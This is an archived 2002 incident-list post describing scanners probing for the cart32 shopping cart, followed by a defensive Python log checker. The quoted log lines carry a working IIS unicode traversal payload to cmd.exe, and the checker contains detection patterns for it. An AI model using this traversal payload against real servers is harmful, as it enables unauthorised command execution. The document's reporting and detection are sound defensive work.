Security Incidents mailing list archives

Smart Web Application Scanners (Sorta)


From: zeno <bugtraq () cgisecurity net>
Date: Mon, 25 Feb 2002 11:34:19 -0500 (EST)

Hey,

I get tons of cart32 scans on my machine. I've noticed that some scanners
are using "smarter" methods of scanning a host for such files.

Examples:

202.95.138.6 - - [25/Feb/2002:11:15:46 -0500] "GET /snortcube.gif HTTP/1.0" 200 61988 "http://www.cgisecurity.com/archive/shop/cart32.txt/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)"
80.17.84.2 - - [25/Feb/2002:11:16:00 -0500] "GET /robots.txt HTTP/1.0" 200 19 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows NT; MS Search 4.0 Robot) Microsoft"
202.95.138.6 - - [25/Feb/2002:11:16:12 -0500] "GET /archive/index.shtml HTTP/1.0" 200 4971 "http://www.cgisecurity.com/archive/shop/cart32.txt/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)"

You'll notice it is trying any file or directory name containing "cart32" to see if it is vulnerable.

www.site/path/cart32.pdf, for example, will have an exploit appended to it like the one above.
If you have cart32 installed and you have renamed it, you may want to peek in your logs, or perhaps
rename it to not contain cart32 in it at all (do with caution).

Also, you will notice the sequential request for robots.txt (may be related, perhaps).
I've seen other scans using different exploits, but I figured some people may be interested.


- zeno () Cgisecurity com
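An added example, not part of zeno's post: a small Python log checker that does the "peek in your logs" step for the pattern above. It parses Apache combined-format lines (an assumption about the format of the quoted entries), folds the overlong UTF-8 slash encoding (%e0%80%af) that hides the traversal from naive string matching, and tags each source IP whose request path or referrer carries "cart32" together with a traversal or cmd.exe. The sample log is constructed from the post's two entries plus one ordinary request; the function names are my own.

```python
import re
from urllib.parse import unquote

# Apache "combined" format (referrer/user-agent optional, so "common" lines parse too).
# Assumption: the entries quoted in the post are in this format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<ref>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Overlong UTF-8 encodings of "/" and "\": unquote() turns them into U+FFFD, so fold
# them first. %e0%80%af is the one used in the post's log entries.
OVERLONG = {"%c0%af": "/", "%e0%80%af": "/", "%c1%9c": "\\", "%e0%81%9c": "\\"}

# Constructed sample: the post's two entries plus one ordinary request (192.0.2.10).
SAMPLE_LOG = r"""
202.95.138.6 - - [25/Feb/2002:11:15:46 -0500] "GET /snortcube.gif HTTP/1.0" 200 61988 "http://www.cgisecurity.com/archive/shop/cart32.txt/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)"
80.17.84.2 - - [25/Feb/2002:11:16:00 -0500] "GET /robots.txt HTTP/1.0" 200 19 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows NT; MS Search 4.0 Robot) Microsoft"
192.0.2.10 - - [25/Feb/2002:11:17:02 -0500] "GET /archive/index.shtml HTTP/1.0" 200 4971 "-" "Mozilla/4.0"
"""

def normalize(value: str) -> str:
    """Lower-case, fold overlong slashes, decode twice (double encoding), unify separators."""
    v = value.lower()
    for enc, ch in OVERLONG.items():
        v = v.replace(enc, ch)
    return unquote(unquote(v)).replace("\\", "/")

def classify(entry: dict) -> set:
    """Tags saying why a request path or its referrer looks like a cart32 probe."""
    tags = set()
    for field in (entry["path"], entry.get("ref") or ""):
        v = normalize(field)
        if "cart32" in v:
            tags.add("cart32")
        if "/../" in v:
            tags.add("traversal")
        if "cmd.exe" in v:
            tags.add("cmd.exe")
    return tags

def scan(log_text: str) -> dict:
    """Map each source IP to the union of tags seen across all of its requests."""
    by_ip = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:  # unparseable lines are skipped rather than guessed at
            by_ip.setdefault(m["ip"], set()).update(classify(m.groupdict()))
    return by_ip
```

Note that the probe lives in the Referer field of an otherwise harmless GET, so a filter that only looks at the request line misses it; an IP that collects all three tags is the scanner the post describes.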

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
